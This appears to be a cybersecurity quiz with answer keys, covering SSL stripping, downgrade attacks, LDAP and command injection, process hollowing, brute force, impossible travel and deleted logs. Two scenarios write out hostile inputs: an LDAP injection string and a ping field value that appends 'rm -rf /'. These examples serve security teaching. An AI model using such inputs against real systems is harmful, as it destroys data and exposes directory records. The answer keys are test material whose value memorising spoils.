How can websites prevent SSL stripping?
A) Use HSTS (HTTP Strict Transport Security)
B) Allow unencrypted login requests
C) Disable HTTPS for compatibility
D) Redirect HTTP requests to HTTP instead of HTTPS
✅ Correct Answer: A) Use HSTS (HTTP Strict Transport Security)
Explanation:
HSTS forces browsers to always use HTTPS, preventing SSL Stripping attacks.
(B) Unencrypted login requests expose credentials.
(C) Disabling HTTPS removes encryption entirely.
(D) Redirecting HTTP to HTTP keeps users on an insecure connection.
Scenario:
A company uses TLS 1.3 encryption for their VPN connections. A hacker forces the client to negotiate a lower encryption protocol (SSL 2.0), allowing them to decrypt VPN traffic.
What type of attack is this?
A) ARP Poisoning
B) Downgrade Attack
C) Session Hijacking
D) Rogue Access Point
✅ Correct Answer: B) Downgrade Attack
Explanation:
A downgrade attack forces the client to use a weaker encryption protocol, making decryption easier.
(A) ARP Poisoning redirects traffic but does not weaken encryption.
(C) Session Hijacking steals session tokens, but does not modify encryption.
(D) Rogue Access Points intercept traffic without forcing encryption downgrades.
How can organizations prevent downgrade attacks?
A) Disable SSL 2.0, SSL 3.0, and TLS 1.0/1.1
B) Use weak encryption for older devices
C) Allow users to manually select encryption strength
D) Use passwords instead of encryption
✅ Correct Answer: A) Disable SSL 2.0, SSL 3.0, and TLS 1.0/1.1
Explanation:
Disabling outdated encryption protocols prevents downgrade attacks.
(B) Weak encryption increases vulnerability.
(C) Allowing manual encryption selection can be risky.
(D) Passwords alone do not protect against encryption attacks.
Scenario:
A company’s internal employee directory website allows users to search for employees by entering their name. The website uses LDAP queries to retrieve the employee’s details.
An attacker enters:
)(uid=))(|(uid=*
After submitting this, the attacker sees a list of all users in the company.
What vulnerability has been exploited?
A) SQL Injection
B) Cross-Site Scripting (XSS)
C) LDAP Injection
D) Buffer Overflow
✅ Correct Answer: C) LDAP Injection
Explanation:
The attacker manipulated the LDAP query to retrieve all users.
(A) SQL Injection affects databases but not LDAP directories.
(B) XSS injects scripts into web pages, but does not exploit LDAP queries.
(D) Buffer Overflow is an attack on memory, not directory services.
How can this company prevent LDAP Injection?
A) Use input validation and sanitization
B) Allow unrestricted wildcard queries
C) Disable LDAP authentication
D) Store LDAP logs in plaintext
✅ Correct Answer: A) Use input validation and sanitization
Explanation:
Validating input prevents attackers from injecting wildcards or special characters.
(B) Allowing wildcard queries makes LDAP Injection easier.
(C) Disabling LDAP authentication removes useful functionality.
(D) Storing logs in plaintext does not prevent injection attacks.
Scenario:
A network monitoring tool allows users to ping a remote server by entering an IP address. A user enters:
8.8.8.8 && rm -rf /
After submitting, the system stops working and all files are deleted.
What vulnerability has been exploited?
A) SQL Injection
B) Cross-Site Request Forgery (CSRF)
C) Command Injection
D) Path Traversal
✅ Correct Answer: C) Command Injection
Explanation:
The attacker appended shell commands (&& rm -rf /) to the system command.
(A) SQL Injection affects databases, not system commands.
(B) CSRF tricks users into making unintended requests, but does not inject commands.
(D) Path Traversal allows access to restricted files, but does not execute commands.
How can this application prevent Command Injection?
A) Only allow valid IP addresses or domain names
B) Execute all commands as an administrator
C) Store user commands in plaintext logs
D) Allow user input to execute without sanitization
✅ Correct Answer: A) Only allow valid IP addresses or domain names
Explanation:
Filtering user input prevents dangerous commands from being executed.
(B) Running commands as an administrator increases damage potential.
(C) Storing logs in plaintext does not prevent command execution.
(D) Allowing unchecked input is what caused the vulnerability.
Scenario:
A malware researcher analyzes a user’s computer and notices that Notepad.exe (a normal application) is secretly making network connections to a suspicious server.
The researcher dumps the memory of Notepad.exe and finds malicious code inside.
What type of attack has occurred?
A) Rootkit Attack
B) Process Injection
C) SQL Injection
D) DNS Poisoning
✅ Correct Answer: B) Process Injection
Explanation:
Process Injection occurs when malicious code is injected into a legitimate process (Notepad.exe).
(A) Rootkits modify system files but do not inject into running processes.
(C) SQL Injection attacks databases, not processes.
(D) DNS Poisoning redirects traffic to malicious sites, but does not modify processes.
How can organizations prevent Process Injection?
A) Use Endpoint Detection & Response (EDR) solutions
B) Allow all applications to run with administrator privileges
C) Disable firewalls and antivirus for performance reasons
D) Ignore unusual behavior in system processes
✅ Correct Answer: A) Use Endpoint Detection & Response (EDR) solutions
Explanation:
EDR solutions monitor suspicious process activity, such as unexpected memory modifications.
(B) Running everything as admin makes attacks worse.
(C) Disabling security features increases vulnerabilities.
(D) Ignoring unusual process behavior allows malware to persist.
Scenario:
An incident response team investigates a Windows server. They notice a process named svchost.exe (a legitimate Windows process) running, but when analyzed, its memory contains unexpected malicious code.
What type of process injection is this?
A) DLL Injection
B) Process Hollowing
C) Cross-Site Scripting (XSS)
D) Brute Force Attack
✅ Correct Answer: B) Process Hollowing
Explanation:
Process Hollowing replaces the memory of a running process with malicious code.
(A) DLL Injection loads malicious DLLs, but does not replace entire process memory.
(C) XSS injects JavaScript into websites, not system processes.
(D) Brute Force Attacks guess passwords, but do not modify processes.
How can organizations prevent Process Hollowing?
A) Use Kernel Security Modules
B) Allow unsigned processes to run freely
C) Disable memory monitoring tools
D) Grant all processes the same security privileges
✅ Correct Answer: A) Use Kernel Security Modules
Explanation:
Kernel security modules monitor process memory for unusual modifications.
(B) Allowing unsigned processes increases risk.
(C) Disabling memory monitoring makes detection harder.
(D) Giving all processes the same privileges makes attacks easier.
Scenario:
A company’s HR system stores employee records in an LDAP directory. A security audit finds that an attacker can retrieve all users by modifying login input, but no database manipulation occurs.
What type of attack is this?
A) SQL Injection
B) LDAP Injection
C) Cross-Site Scripting (XSS)
D) Denial of Service (DoS)
✅ Correct Answer: B) LDAP Injection
Explanation:
LDAP Injection manipulates LDAP queries to extract sensitive directory data.
(A) SQL Injection affects relational databases, not directory services.
(C) XSS injects malicious JavaScript, but does not manipulate directory queries.
(D) DoS attacks overload a system, but do not extract user data.
How can organizations prevent LDAP Injection?
A) Use parameterized queries and input validation
B) Allow wildcard search queries
C) Disable user authentication
D) Log all login attempts in plaintext
✅ Correct Answer: A) Use parameterized queries and input validation
Explanation:
Parameterized queries prevent query manipulation.
(B) Allowing wildcard searches makes LDAP Injection easier.
(C) Disabling authentication removes security.
(D) Logging logins does not prevent injection attacks.
Scenario:
A company’s Active Directory logs show that a single user account has been locked out 15 times in one hour. The failed login attempts are coming from different IP addresses.
What is the most likely cause of this behavior?
A) User forgot their password
B) A brute-force attack is in progress
C) The company’s password policy is too strict
D) A system error is preventing logins
✅ Correct Answer: B) A brute-force attack is in progress
Explanation:
Multiple failed login attempts from different IP addresses indicate an automated attack.
(A) A user forgetting their password is unlikely to lock the account that many times in one hour.
(C) A strict password policy may cause occasional lockouts but would not cause multiple IP addresses attempting logins.
(D) System errors are possible, but a brute-force attack is a more likely explanation.
How can this company prevent future brute-force attacks?
A) Implement account lockout policies after multiple failed login attempts
B) Require multi-factor authentication (MFA) for login
C) Use CAPTCHAs to prevent automated login attempts
D) All of the above
✅ Correct Answer: D) All of the above
Explanation:
(A) Account lockout policies slow down brute-force attacks.
(B) MFA prevents unauthorized access even if a password is guessed.
(C) CAPTCHAs block automated bots from trying multiple passwords.
Scenario:
An employee logs into the company’s VPN from their home in California at 9:00 AM. At 9:05 AM, another session for the same user account is detected from an IP address in Russia.
What is the most likely explanation?
A) The employee is using a VPN service
B) The employee is traveling between locations
C) The employee’s credentials have been compromised
D) The user is working from multiple devices
✅ Correct Answer: C) The employee’s credentials have been compromised
Explanation:
It is impossible to travel from California to Russia in 5 minutes. This suggests an attacker is using stolen credentials.
(A) VPN services can make login locations appear different, but this scenario lacks evidence of VPN use.
(B) Travel is physically impossible in this timeframe.
(D) Multiple devices wouldn’t explain the geographically distant logins.
What action should be taken?
A) Disable the employee’s account immediately
B) Investigate logs to confirm unusual activity before taking action
C) Ignore it, as false positives are common
D) Change the password and notify the user
✅ Correct Answer: B) Investigate logs to confirm unusual activity before taking action
Explanation:
Immediate disablement (A) could disrupt legitimate users.
Checking logs (B) is best practice to confirm a real attack.
(C) Ignoring the alert is risky.
(D) Changing the password is good, but investigation should come first.
Scenario:
A security analyst notices that a user logged in from Brazil at 2:00 AM, and then logged in from Germany at 2:15 AM.
Which IoC does this best represent?
A) Account Lockout
B) Resource Consumption
C) Impossible Travel
D) Command Injection
✅ Correct Answer: C) Impossible Travel
Explanation:
It is physically impossible to travel from Brazil to Germany in 15 minutes.
(A) Account Lockouts involve multiple failed logins.
(B) Resource Consumption relates to high CPU/memory usage.
(D) Command Injection involves executing unauthorized system commands.
How can security teams respond to Impossible Travel incidents?
A) Verify if the user is using a VPN
B) Force the user to reset their password
C) Monitor future logins from unexpected locations
D) All of the above
✅ Correct Answer: D) All of the above
Explanation:
(A) Some VPN services can make logins appear from distant locations.
(B) Resetting the password prevents attackers from using stolen credentials.
(C) Future logins should be monitored for signs of further compromise.
Scenario:
A company’s web server CPU usage suddenly spikes from 10% to 95% for several hours, slowing down access to the website.
What is the most likely explanation?
A) A hacker is running a crypto-mining operation on the server
B) The server is under a Distributed Denial of Service (DDoS) attack
C) A system update caused temporary CPU usage increase
D) Both A and B
✅ Correct Answer: D) Both A and B
Explanation:
Sudden CPU spikes can indicate DDoS attacks (B) or malware mining cryptocurrency (A).
(C) System updates cause temporary spikes but not prolonged high CPU use.
How can companies defend against these threats?
A) Use Intrusion Detection Systems (IDS) to detect unusual activity
B) Monitor CPU and network usage for anomalies
C) Implement firewalls and rate limiting to block DDoS attacks
D) All of the above
✅ Correct Answer: D) All of the above
Explanation:
(A) IDS tools help detect unauthorized activity.
(B) Monitoring CPU usage helps detect crypto-mining malware.
(C) Firewalls block suspicious traffic during a DDoS attack.
Scenario:
A security team investigates a suspected breach. They find that the log files for a critical database server are missing for a 4-hour period.
What is the most likely cause?
A) The logs were automatically deleted due to system settings
B) An attacker deleted the logs to cover their tracks
C) A database error caused the logs to disappear
D) A software update removed the logs
✅ Correct Answer: B) An attacker deleted the logs to cover their tracks
Explanation:
Hackers often delete logs to erase evidence of their actions.
(A) System settings might delete logs, but usually not selectively.
(C) A database error is less likely to remove only security logs.
(D) Software updates do not delete random logs.
What should the security team do next?
A) Investigate backups and alternative logging sources
B) Restore the missing logs from a previous backup
C) Review other security alerts during the missing log period
D) All of the above
✅ Correct Answer: D) All of the above
Explanation:
(A) Attackers may forget to delete backups or redundant logs.
(B) If backups exist, they can restore the logs.
(C) Checking other alerts helps correlate suspicious activity.
